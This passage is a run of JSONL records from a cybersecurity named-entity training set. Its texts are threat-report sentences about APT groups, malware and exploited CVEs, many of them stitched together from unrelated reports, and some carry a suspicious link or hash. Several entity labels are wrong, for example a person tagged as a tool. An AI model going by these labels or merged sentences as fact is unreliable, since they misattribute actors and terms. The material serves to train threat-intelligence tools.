LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"TOOL: Slingshot": [[123, 132]], "THREAT_ACTOR: Barium": [[228, 234]], "ORGANIZATION: SOC personnel": [[305, 318]]}, "info": {"id": "cyberner_stix_train_007345", "source": "cyberner_stix_train"}} {"text": "Link embedded in the PDF document : https://csaasd.egnyte.com/dd/h5s7YHzOy5 .", "spans": {"TOOL: PDF": [[21, 24]], "URL: https://csaasd.egnyte.com/dd/h5s7YHzOy5": [[36, 75]]}, "info": {"id": "cyberner_stix_train_007346", "source": "cyberner_stix_train"}} {"text": "In an example observed by CTU researchers , the Nbtscan executable was named Adobe.exe and was installed in several working directories on compromised hosts , including : C:\\Recovery\\ .", "spans": {"ORGANIZATION: CTU": [[26, 29]], "TOOL: Nbtscan": [[48, 55]], "FILEPATH: Adobe.exe": [[77, 86]]}, "info": {"id": "cyberner_stix_train_007347", "source": "cyberner_stix_train"}} {"text": "Swiss Post - The national postal service of Switzerland , a fully state-owned limited company ( AG ) regulated by public law . While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . 
Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Swiss Post": [[0, 10]], "ORGANIZATION: we": [[133, 135]], "THREAT_ACTOR: APT33": [[253, 258]], "ORGANIZATION: Unit 42": [[487, 494]], "THREAT_ACTOR: Gorgon Group": [[552, 564]], "ORGANIZATION: governmental organizations": [[575, 601]]}, "info": {"id": "cyberner_stix_train_007348", "source": "cyberner_stix_train"}} {"text": "For versions 11.0 and 11.4 , the installation is straightforward . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . The expected TXT record response has the following structure: . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"THREAT_ACTOR: APT12": [[131, 136]], "THREAT_ACTOR: group": [[209, 214]], "ORGANIZATION: OT defenders": [[418, 430]], "ORGANIZATION: asset owners": [[435, 447]], "MALWARE: COSMICENERGY": [[487, 499]]}, "info": {"id": "cyberner_stix_train_007349", "source": "cyberner_stix_train"}} {"text": "After unpacking itself , the Spark backdoor creates a hidden window where most of the malicious activity is handled .", "spans": {"MALWARE: Spark backdoor": [[29, 43]], "SYSTEM: window": [[61, 67]]}, "info": {"id": "cyberner_stix_train_007350", "source": "cyberner_stix_train"}} {"text": "By : Tony Bao , Junzhi Lu April 14 , 2020 We discovered a potential cyberespionage campaign , which we have named Project Spy , that infects Android and iOS devices with spyware ( detected by Trend Micro as 
AndroidOS_ProjectSpy.HRX and IOS_ProjectSpy.A , respectively ) . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment . the following functions with multiple control flow dispatchers can be unflattened . A New Threat on the Horizon : CL0P", "spans": {"MALWARE: Project Spy": [[114, 125]], "SYSTEM: Android": [[141, 148]], "SYSTEM: iOS": [[153, 156]], "ORGANIZATION: Trend Micro": [[192, 203]], "ORGANIZATION: LookingGlass": [[285, 297]], "ORGANIZATION: military": [[407, 415]], "THREAT_ACTOR: CL0P": [[568, 572]]}, "info": {"id": "cyberner_stix_train_007351", "source": "cyberner_stix_train"}} {"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained . attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[92, 105]], "TOOL: emails": [[226, 232]], "VULNERABILITY: exploit": [[277, 284]], "THREAT_ACTOR: ScarCruft": [[305, 314]]}, "info": {"id": "cyberner_stix_train_007352", "source": "cyberner_stix_train"}} {"text": "The initial dropper ( which varies across attacks ) is delivered to the victim via email or web :", "spans": {"TOOL: email": [[83, 88]]}, "info": {"id": "cyberner_stix_train_007353", "source": "cyberner_stix_train"}} {"text": "The malware has all the popular capabilities of modern spyware . On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT . 
These victims decrypted their files without accepting the ransom demands saving these individuals an estimated 1.5 billion .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[86, 117]], "THREAT_ACTOR: cybercrime group": [[143, 159]], "THREAT_ACTOR: HIDDEN COBRA": [[160, 172]], "ORGANIZATION: cryptocurrency": [[193, 207]], "ORGANIZATION: financial organizations": [[212, 235]], "THREAT_ACTOR: APT33": [[238, 243]], "MALWARE: 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT": [[246, 328]], "ORGANIZATION: victims": [[337, 344]]}, "info": {"id": "cyberner_stix_train_007354", "source": "cyberner_stix_train"}} {"text": "Use of customized njRAT ( capable of evading anti-virus ) .", "spans": {"MALWARE: njRAT": [[18, 23]]}, "info": {"id": "cyberner_stix_train_007355", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "FILEPATH: At.exe": [[21, 27]]}, "info": {"id": "cyberner_stix_train_007356", "source": "cyberner_stix_train"}} {"text": "You may review your application list in “ Settings - > Apps ” , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected . As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . . 
A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"ORGANIZATION: Check Point": [[160, 171]], "SYSTEM: ZoneAlarm": [[172, 181]], "TOOL: WHITEOUT malware": [[267, 283]], "THREAT_ACTOR: APT38": [[300, 305]], "ORGANIZATION: bank": [[363, 367]], "SYSTEM: Microsoft Exchange server": [[374, 399]], "SYSTEM: Client Access Service": [[471, 492]]}, "info": {"id": "cyberner_stix_train_007357", "source": "cyberner_stix_train"}} {"text": "Is the malware already set as the default SMS application ? Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: Whitefly": [[148, 156]], "ORGANIZATION: defense": [[190, 197]], "ORGANIZATION: telecoms": [[200, 208]], "ORGANIZATION: energy": [[215, 221]], "THREAT_ACTOR: attackers": [[265, 274]], "TOOL: emails": [[289, 295]], "FILEPATH: XLS files": [[321, 330]], "ORGANIZATION: employees working in the banking sector": [[334, 373]]}, "info": {"id": "cyberner_stix_train_007358", "source": "cyberner_stix_train"}} {"text": "The library that uses tinyML is not yet wired to the malware ’ s functionalities , but its presence in the malware code indicates the intention to do so in future variants . Ke3chang attackers have used spear-phishing emails . 
Analysis in multiple maturity levels , One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"SYSTEM: tinyML": [[22, 28]], "THREAT_ACTOR: Ke3chang": [[174, 182]], "THREAT_ACTOR: attackers": [[183, 192]], "THREAT_ACTOR: Hack520": [[295, 302]]}, "info": {"id": "cyberner_stix_train_007359", "source": "cyberner_stix_train"}} {"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "ORGANIZATION: personnel": [[56, 65]], "ORGANIZATION: military and political assignments": [[77, 111]], "MALWARE: command and control servers": [[237, 264]]}, "info": {"id": "cyberner_stix_train_007360", "source": "cyberner_stix_train"}} {"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": {"MALWARE: Baidu search engine": [[163, 182]]}, "info": {"id": "cyberner_stix_train_007361", "source": "cyberner_stix_train"}} {"text": "Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible .", "spans": {"TOOL: Wi-Fi networks": [[20, 34]]}, "info": {"id": "cyberner_stix_train_007362", "source": "cyberner_stix_train"}} {"text": "mobile_treats_2013_05s Infections caused by mobile banking programs Today , the majority of banking Trojan attacks affect users in Russia and the CIS . The document attached to this e-mail exploits CVE-2012-0158 . 
One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld : 443 where [backdoor_type] is a single letter which is either “ w ” in the case of the Winnti malware or “ b ” in the case of ShadowPad . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"VULNERABILITY: e-mail exploits": [[182, 197]], "VULNERABILITY: CVE-2012-0158": [[198, 211]], "TOOL: C&C": [[239, 242]], "MALWARE: Winnti": [[260, 266], [432, 438]], "MALWARE: ShadowPad": [[271, 280], [471, 480]], "ORGANIZATION: Progress": [[671, 679]]}, "info": {"id": "cyberner_stix_train_007363", "source": "cyberner_stix_train"}} {"text": "These campaigns utilized specially-crafted malicious Microsoft Word documents and PDF files , which were sent as e-mail attachments to various personnel in an attempt to infiltrate the targeted organizations .", "spans": {"ORGANIZATION: Microsoft": [[53, 62]], "TOOL: Word": [[63, 67]], "TOOL: PDF": [[82, 85]], "TOOL: e-mail": [[113, 119]]}, "info": {"id": "cyberner_stix_train_007364", "source": "cyberner_stix_train"}} {"text": "The attackers relied heavily on the CVE-2014-0515 Metasploit module , which is well documented .", "spans": {"VULNERABILITY: CVE-2014-0515": [[36, 49]], "TOOL: Metasploit": [[50, 60]]}, "info": {"id": "cyberner_stix_train_007365", "source": "cyberner_stix_train"}} {"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . 
By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device .", "spans": {"THREAT_ACTOR: attackers": [[40, 49]], "TOOL: DDE protocol": [[75, 87]], "FILEPATH: SWAnalytics": [[178, 189]]}, "info": {"id": "cyberner_stix_train_007366", "source": "cyberner_stix_train"}} {"text": "Attackers are taking the time and effort to steal certificates because it is becoming necessary to gain a foothold on a targeted computer .", "spans": {}, "info": {"id": "cyberner_stix_train_007367", "source": "cyberner_stix_train"}} {"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools . Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions . 
Budworm executes SysUpdate on victim networks by DLL sideloading the payload using the legitimate INISafeWebSSO application .", "spans": {"ORGANIZATION: CTU": [[160, 163]], "FILEPATH: init": [[301, 305]], "FILEPATH: init2": [[310, 315]], "THREAT_ACTOR: Budworm": [[470, 477]], "MALWARE: SysUpdate": [[487, 496]], "TOOL: INISafeWebSSO application": [[568, 593]]}, "info": {"id": "cyberner_stix_train_007368", "source": "cyberner_stix_train"}} {"text": "Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[46, 54]]}, "info": {"id": "cyberner_stix_train_007369", "source": "cyberner_stix_train"}} {"text": "The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "MALWARE: MiniDuke": [[100, 108]], "MALWARE: CozyDuke": [[113, 121]]}, "info": {"id": "cyberner_stix_train_007370", "source": "cyberner_stix_train"}} {"text": "FakeM 's functional code is shellcode-based and requires another Trojan to load it into memory and execute it . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"TOOL: FakeM": [[0, 5]], "THREAT_ACTOR: Lazarus": [[156, 163]], "TOOL: emails": [[184, 190]], "ORGANIZATION: Bitcoin users": [[241, 254]], "ORGANIZATION: financial organizations": [[266, 289]]}, "info": {"id": "cyberner_stix_train_007371", "source": "cyberner_stix_train"}} {"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device . 
Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt . Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"ORGANIZATION: CTU": [[154, 157]], "THREAT_ACTOR: TG-3390": [[182, 189]], "ORGANIZATION: political intelligence": [[291, 313]], "ORGANIZATION: governments": [[319, 330]], "TOOL: dota3": [[554, 559]], "TOOL: commercial spyware tools": [[712, 736]]}, "info": {"id": "cyberner_stix_train_007372", "source": "cyberner_stix_train"}} {"text": "The server then sends a reply that contains instructions on further actions to be taken . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": {"MALWARE: decoy files": [[156, 167]], "ORGANIZATION: Dragos": [[245, 251]], "THREAT_ACTOR: Leafminer group": [[267, 282]], "ORGANIZATION: electric utility sector": [[318, 341]]}, "info": {"id": "cyberner_stix_train_007373", "source": "cyberner_stix_train"}} {"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": {"ORGANIZATION: Baidu": [[48, 53]], "SYSTEM: Google Play": [[85, 96]], "ORGANIZATION: CSIS": [[198, 202]], "VULNERABILITY: Carbanak": [[236, 244]], "ORGANIZATION: customers": [[274, 283]], "THREAT_ACTOR: APT10": [[315, 320]], "MALWARE: reverse shell": [[335, 348]], "MALWARE: RDP": [[352, 355]], "THREAT_ACTOR: actor": [[396, 401]]}, "info": {"id": "cyberner_stix_train_007374", "source": "cyberner_stix_train"}} {"text": "The winrar binaries and compressed data were found mostly in the Recycle Bin folder , a TTP that was previously observed in APT10-related attacks , as well as others . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"TOOL: winrar": [[4, 10]], "TOOL: Recycle Bin folder": [[65, 83]], "TOOL: TTP": [[88, 91]], "ORGANIZATION: intelligence services": [[235, 256]], "ORGANIZATION: military": [[259, 267]], "ORGANIZATION: utility providers": [[270, 287]], "ORGANIZATION: telecommunications": [[290, 308]], "ORGANIZATION: power": [[313, 318]], "ORGANIZATION: embassies": [[323, 332]], "ORGANIZATION: government institutions": [[339, 362]]}, "info": {"id": "cyberner_stix_train_007375", "source": "cyberner_stix_train"}} {"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer . 
Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": {"TOOL: backdoor Trojan": [[86, 101]], "THREAT_ACTOR: attackers": [[120, 129]], "MALWARE: Trochilus": [[188, 197]], "MALWARE: MoonWind RATs": [[202, 215]]}, "info": {"id": "cyberner_stix_train_007376", "source": "cyberner_stix_train"}} {"text": "Concurrently with the alterations to CosmicDuke , the Dukes were also hard at work modifying their trusted loader .", "spans": {"MALWARE: CosmicDuke": [[37, 47]], "THREAT_ACTOR: Dukes": [[54, 59]]}, "info": {"id": "cyberner_stix_train_007377", "source": "cyberner_stix_train"}} {"text": "In all of these cases , the techniques are the same , but the code itself has been altered to work with the toolset in question , leading to small differences in the final implementation .", "spans": {}, "info": {"id": "cyberner_stix_train_007378", "source": "cyberner_stix_train"}} {"text": "Another variant executes a set of commands once a system is successfully compromised .", "spans": {}, "info": {"id": "cyberner_stix_train_007379", "source": "cyberner_stix_train"}} {"text": "Cylance tracks this threat group internally as ' Snake Wine ' . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: Snake Wine": [[49, 59]], "THREAT_ACTOR: actor’s": [[75, 82]], "TOOL: emails": [[83, 89]], "FILEPATH: malicious payload": [[136, 153]], "ORGANIZATION: users": [[218, 223]]}, "info": {"id": "cyberner_stix_train_007380", "source": "cyberner_stix_train"}} {"text": "Based on our research and Benoît Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server . 
As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users . Most of the samples appeared to have at least three C&C servers hard coded for redundancy . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"ORGANIZATION: Wolf Intelligence": [[72, 89]], "TOOL: Lurk": [[236, 240]], "TOOL: C&C": [[416, 419]], "ORGANIZATION: Malwarebytes": [[456, 468]]}, "info": {"id": "cyberner_stix_train_007381", "source": "cyberner_stix_train"}} {"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": {"MALWARE: Anubis": [[106, 112]], "MALWARE: UMBRAGE": [[159, 166]], "TOOL: multiple tools": [[358, 372]], "TOOL: anonymous infrastructure": [[377, 401]]}, "info": {"id": "cyberner_stix_train_007382", "source": "cyberner_stix_train"}} {"text": "It’s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , ” said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . 
Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide .", "spans": {"TOOL: malware": [[129, 136]], "TOOL: Dennis Schwarz": [[146, 160]], "ORGANIZATION: Arbor": [[183, 188]], "THREAT_ACTOR: groups": [[253, 259]], "ORGANIZATION: government": [[308, 318]], "ORGANIZATION: electric": [[332, 340]], "FILEPATH: KHNP documents": [[461, 475]], "THREAT_ACTOR: actors": [[495, 501]], "ORGANIZATION: South Korean Government": [[575, 598]], "ORGANIZATION: financial": [[856, 865]], "ORGANIZATION: nations": [[877, 884]]}, "info": {"id": "cyberner_stix_train_007383", "source": "cyberner_stix_train"}} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . 
Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]], "ORGANIZATION: space exploration": [[339, 356]], "ORGANIZATION: nanotechnology": [[359, 373]], "ORGANIZATION: energy production": [[376, 393]], "ORGANIZATION: nuclear power": [[396, 409]], "ORGANIZATION: lasers": [[412, 418]], "ORGANIZATION: medicine": [[421, 429]], "ORGANIZATION: communications": [[434, 448]]}, "info": {"id": "cyberner_stix_train_007384", "source": "cyberner_stix_train"}} {"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: TG-3390": [[150, 157]], "ORGANIZATION: data center employees": [[185, 206]]}, "info": {"id": "cyberner_stix_train_007385", "source": "cyberner_stix_train"}} {"text": "Several technical details indicated that the software was likely the product of a well-funded development effort and aimed at the lawful intercept market . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": {"VULNERABILITY: Carbanak": [[184, 192]], "ORGANIZATION: banks": [[226, 231]], "MALWARE: backdoor": [[412, 420]], "MALWARE: POWERSTATS": [[433, 443]]}, "info": {"id": "cyberner_stix_train_007386", "source": "cyberner_stix_train"}} {"text": "Analysis of this telemetry shows infected devices are completely based in Gaza , Palestine . 
In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog . They usually download HTML pages from a system within APT1 ’s hop infrastructure . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": {"ORGANIZATION: FireEye": [[109, 116]], "TOOL: DeputyDog": [[203, 212]], "TOOL: HTML": [[237, 241]], "THREAT_ACTOR: APT1": [[269, 273]], "THREAT_ACTOR: actors": [[306, 312]]}, "info": {"id": "cyberner_stix_train_007387", "source": "cyberner_stix_train"}} {"text": "Through this vector , we could drop our own Quasar clien on the attacker ’s server and execute it .", "spans": {"MALWARE: Quasar": [[44, 50]]}, "info": {"id": "cyberner_stix_train_007388", "source": "cyberner_stix_train"}} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "SYSTEM: Windows": [[150, 157]], "ORGANIZATION: Kazuar": [[212, 218]]}, "info": {"id": "cyberner_stix_train_007389", "source": "cyberner_stix_train"}} {"text": "The CloudDuke downloader will download and execute additional malware from a preconfigured location .", "spans": {"MALWARE: CloudDuke": [[4, 13]], "TOOL: downloader": [[14, 24]]}, "info": {"id": "cyberner_stix_train_007390", "source": "cyberner_stix_train"}} {"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up windows . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection ’s antivirus component detect and stop malicious techniques at multiple points along the attack chain . This activity is followed quickly by additional access and persistent mechanisms .", "spans": {"SYSTEM: windows": [[136, 143]], "THREAT_ACTOR: Patchwork": [[155, 164]], "MALWARE: RTF files": [[191, 200]], "VULNERABILITY: CVE-2017-8570": [[212, 225]], "TOOL: Microsoft Defender Advanced Threat Protection": [[294, 339]], "TOOL: antivirus component": [[343, 362]]}, "info": {"id": "cyberner_stix_train_007391", "source": "cyberner_stix_train"}} {"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank . At this time , we do not believe that the attackers found a new ASA exploit . APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": {"ORGANIZATION: we": [[211, 213]], "THREAT_ACTOR: attackers": [[238, 247]], "VULNERABILITY: ASA": [[260, 263]], "VULNERABILITY: exploit": [[264, 271]], "THREAT_ACTOR: APT29": [[274, 279]], "THREAT_ACTOR: YTTRIUM": [[282, 289]], "THREAT_ACTOR: The Dukes": [[292, 301]], "THREAT_ACTOR: Cozy Bear": [[304, 313]], "THREAT_ACTOR: CozyDuke": [[316, 324]]}, "info": {"id": "cyberner_stix_train_007392", "source": "cyberner_stix_train"}} {"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . That is performed by the function DeleteAndLogPlugin . 
Using differential firmware analysis , we identified the vulnerable endpoint and developed a PoC to validate the vulnerability .", "spans": {"ORGANIZATION: gaming organizations": [[203, 223]]}, "info": {"id": "cyberner_stix_train_007393", "source": "cyberner_stix_train"}} {"text": "Retrieve all SMS messages . the group 's targets include an embassy in Belgium . The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": {"ORGANIZATION: embassy": [[60, 67]], "THREAT_ACTOR: threat actors": [[298, 311]], "THREAT_ACTOR: Winnti": [[328, 334]]}, "info": {"id": "cyberner_stix_train_007394", "source": "cyberner_stix_train"}} {"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector . Both executed a JScript file named “ error ” in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Group-IB": [[79, 87]], "ORGANIZATION: financial sector": [[196, 212]], "TOOL: JScript": [[231, 238]], "FILEPATH: Errors.txt": [[272, 282]], "THREAT_ACTOR: FIN7": [[298, 302]], "FILEPATH: Errors.bat": [[305, 315]], "MALWARE: EmpireMonkey": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007395", "source": "cyberner_stix_train"}} {"text": "Then , it sends it to the C2 server using the URL that ends with /servlet/ContactUpload . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . 
McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": {"MALWARE: stylecss.aspx": [[158, 171]], "MALWARE: China Chopper": [[243, 256]], "ORGANIZATION: McAfee Advanced Threat Research": [[259, 290]], "MALWARE: SYSCON backdoor": [[461, 476]]}, "info": {"id": "cyberner_stix_train_007396", "source": "cyberner_stix_train"}} {"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” .", "spans": {"THREAT_ACTOR: Night Dragon": [[0, 12]], "ORGANIZATION: social engineering": [[38, 56]], "TOOL: remote administration tools": [[209, 236]], "TOOL: RATs": [[239, 243]], "ORGANIZATION: oil and gas": [[368, 379]], "FILEPATH: SWAnalytics": [[432, 443]], "SYSTEM: Android": [[465, 472]]}, "info": {"id": "cyberner_stix_train_007397", "source": "cyberner_stix_train"}} {"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . 
Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": {"VULNERABILITY: zero-day vulnerability": [[31, 53]], "ORGANIZATION: Symantec": [[84, 92]], "ORGANIZATION: platform providers": [[299, 317]]}, "info": {"id": "cyberner_stix_train_007398", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: Barium": [[251, 257]]}, "info": {"id": "cyberner_stix_train_007399", "source": "cyberner_stix_train"}} {"text": "It is interesting to see that the HTTP POST host header refers to a legitimate domain cnet.com , however , in acutality , the data is sent to nysura.com , as can be seen in the traffic screenshot below .", "spans": {"DOMAIN: cnet.com": [[86, 94]], "DOMAIN: nysura.com": [[142, 152]]}, "info": {"id": "cyberner_stix_train_007400", "source": "cyberner_stix_train"}} {"text": "The creator of the weaponized document appended their DDE instructions to the end of the document after all of the decoy contents .", "spans": {}, "info": {"id": "cyberner_stix_train_007401", "source": "cyberner_stix_train"}} {"text": "The IP addresses hosting remote templates and C2 services in these attacks are classified as Command and Control .", "spans": {"TOOL: C2": [[46, 48]], "TOOL: Command and Control": [[93, 112]]}, "info": {"id": "cyberner_stix_train_007402", "source": "cyberner_stix_train"}} 
